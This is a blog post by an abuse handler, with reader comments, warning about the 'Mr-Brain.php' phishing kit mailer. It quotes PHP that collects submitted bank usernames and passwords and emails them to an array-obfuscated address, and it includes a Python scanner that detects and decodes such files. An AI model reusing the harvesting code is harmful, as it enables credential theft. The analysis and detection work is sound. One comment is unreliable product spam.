Watch out for “Mr-Brain.php” – phishing script

As well as my normal development duties I deal with some of the incoming abuse reports at work, and recently I’ve dealt with a number of phishing sites which submit data to a script named “Mr-Brain.php”. A quick Google showed no useful results, so I’m posting about it here.

The script gathers the details submitted by the phishing site and emails them off. The actual file seems to change a bit for each spam.

Telltale bits from one of them:


$message .= "--------------HaLiFaX UK Bank Spam ReZulT-----------------------\n";
$message .= "Username: ".$_POST['Username']."\n";
$message .= "Password: ".$_POST['Password']."\n";
[..... removed some lines for brevity.....]
$message .= "---------------Created By yassine.h01------------------------------\n";

It also makes a pretty laughable attempt to hide what email address it’s really sending the info to, by picking characters out of an array:


$ar=array("0"=>"3","1"=>"a","2"=>"w","3"=>"l","4"=>"d","5"=>"i","6"=>"@","7"=>".","8"=>"y","9"=>"h","10"=>"o","11"=>"c","12"=>"m");
$to=$ar['1'].$ar['2'].$ar['2'].$ar['3'].$ar['4'].$ar['5'].$ar['0'].$ar['0'].$ar['0'].$ar['6'].$ar['8'].$ar['1'].$ar['9'].$ar['10'].$ar['10'].$ar['7']
.$ar['11'].$ar['10'].$ar['12'];

… because that will really stop anyone with half a clue seeing what’s going on.

Might well be worth searching your servers for any files named “Mr-Brain.php” as a quick way to locate phishing attempts. A quick find / -name Mr-Brain.php will get you a list of any dodgy sites being hosted, quickly and easily.
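A name search only finds copies that keep the name, and the file changes from one campaign to the next. The sketch below is an added example, not code from the original post: it flags PHP files by name or by the markers visible in the excerpts above, and statically resolves an array-built $to so the drop address can go into the abuse report. The marker regexes, the constructed sample and the function names are assumptions.

```python
import re, tempfile
from pathlib import Path

# File names reported on this page; content is checked too, in case of renames.
KNOWN_NAMES = {"mr-brain.php", "sitekey.php"}
# Assumed markers from the excerpts: password appended to $message, dashed banner.
POST_PASSWORD = re.compile(r"""\$message\s*\.=.*\$_POST\[\s*['"]?pass""", re.I)
BANNER = re.compile(r"-{5,}\s*Created\s+By\b", re.I)
ARRAY_DEF = re.compile(r"\$(\w+)\s*=\s*array\((.*?)\)\s*;", re.S)
PAIR = re.compile(r"""["'](\w+)["']\s*=>\s*["'](.*?)["']""")
LOOKUP = re.compile(r"""\$(\w+)\[\s*['"]?(\w+)['"]?\s*\]""")

# Constructed sample mailer (not a real kit); the address uses the reserved .test TLD.
SAMPLE = r'''<?php
$message .= "--------ExampleBank ReZulT--------\n";
$message .= "Password: ".$_POST['Password']."\n";
$message .= "--------Created By placeholder--------\n";
$ar=array("0"=>"a","1"=>"@","2"=>"b","3"=>".","4"=>"t","5"=>"e","6"=>"s");
$to=$ar['0'].$ar['1'].$ar['2'].$ar['3'].$ar['4'].$ar['5'].$ar['6'].$ar['4'];
'''

def decode_recipient(src):
    """Statically resolve a $to built from array lookups; the PHP is never executed."""
    tables = {name: dict(PAIR.findall(body)) for name, body in ARRAY_DEF.findall(src)}
    m = re.search(r"\$to\s*=(.*?);", src, re.S)
    chars = [tables.get(n, {}).get(k) for n, k in LOOKUP.findall(m.group(1))] if m else []
    return "".join(chars) if chars and None not in chars else None

def scan(root):
    """Return {relative path: (reasons, decoded recipient)} for suspicious .php files."""
    hits = {}
    for path in Path(root).rglob("*"):
        if path.suffix.lower() != ".php" or not path.is_file():
            continue
        src = path.read_text(errors="replace")
        reasons = ["name"] if path.name.lower() in KNOWN_NAMES else []
        if POST_PASSWORD.search(src) and BANNER.search(src):
            reasons.append("content")
        if reasons:
            hits[str(path.relative_to(root))] = (reasons, decode_recipient(src))
    return hits

def demo():
    """Scan a throwaway tree: renamed mailer, empty known-name file, benign form."""
    with tempfile.TemporaryDirectory() as root:
        Path(root, "update.php").write_text(SAMPLE)
        Path(root, "Mr-Brain.php").write_text("<?php\n")
        Path(root, "contact.php").write_text('<?php $message .= "Name: ".$_POST["name"];\n')
        return scan(root)
```

Point scan() at a web root and treat the hits as leads to review by hand, since the content markers are heuristics.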

A quick Google for “yassine.h01” returned a site hosting a large list of pre-made phishing sites… just unzip, change the Mr-Brain.php file with your address, and upload. Reported it, but it’s a Russian host, so not holding my breath.

Have any info to add? Go ahead and leave a comment (please!).

7 thoughts on “Watch out for “Mr-Brain.php” – phishing script”

  1. Another similar looking script I found was named Sitekey.php which was part of a Bank of America phishing site… it looks like it’s either made by the same person, or just modified by someone. It contains “Created By xXMr_SpAmErSxX” in the mail it sends.

    I also saw one called log.php which it seems is designed to steal Hotmail cookies, containing “abdullah00” and “By Mr.ALJoOoKeR”.

  2. Still seeing more Mr-Brain.php scripts, often with different “Created By” lines, including:
    —————Created BY Mr-c/qadir——————————

  3. Update: Googling for “yassine.h01” no longer returns the site hosting pre-made phishing sites, so maybe the host acted on the report and took it down.

  4. Identity theft is certainly a very real thing to deal with and the internet only makes it easier to become a victim. Email phishing scams are everywhere and most people can’t tell the difference between a real site and the fake one. I found this new resource called ShopShield.net. Check it out; they protect your identity while you are online.
